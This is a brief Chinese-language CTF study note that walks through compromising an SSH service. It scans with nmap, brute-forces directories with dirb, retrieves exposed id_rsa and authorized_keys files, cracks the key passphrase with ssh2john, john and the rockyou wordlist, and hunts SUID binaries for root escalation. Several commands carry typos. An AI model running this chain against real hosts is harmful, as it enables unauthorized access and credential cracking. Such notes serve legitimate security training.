CTF-ssh服务信息收集
-
信息收集
Namp -sV 目标IP -
分析端口信息
-
探测大端口信息
例如http协议,通过IP端口访问http服务,即网页信息,通过页面源代 码,或服务器隐藏文件探测
Dirb http://ip:端口 -
隐藏页面分析
挖掘ssh信息,远程登陆 .ssh 文件
获取ssh的rsa的id和认证关键字
robots.text不允许访问的文件夹信息 -
获取到两个文件 id_rsa & authorized_-keys
连接目标主机
1.赋予id_ras可读写权限 Chmod 600 文件名
2.连接目标主机,用户名在authorized_ keys Ssh -I id_rsa 用户名@目标IP
3.解密ssh密钥信息
利用john2工具
1.将id_ras文件转化为ssh2john可以识别的信息
Ssh2john id_rsa > rsacrack
Python ssh2johnPath id_rsa > rsacrack
2.利用字典解密rsacrack信息
Zcat /user/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack
John rsacrack
3.利用解密信息远程登陆目标主机
Ssh -I id_rsa usernam@IP
4.登陆远程主机之后,通过访问根目录
登陆后,可能处于用户权限而非root权限
5.查找具有root权限的文件 Find / -perm -4000 2>/dev/null
运行可能溢出,提权的程序
Bin/sh 可能是shell脚本语言具有root权限,execve函数执行bin/sh文件,获得root权限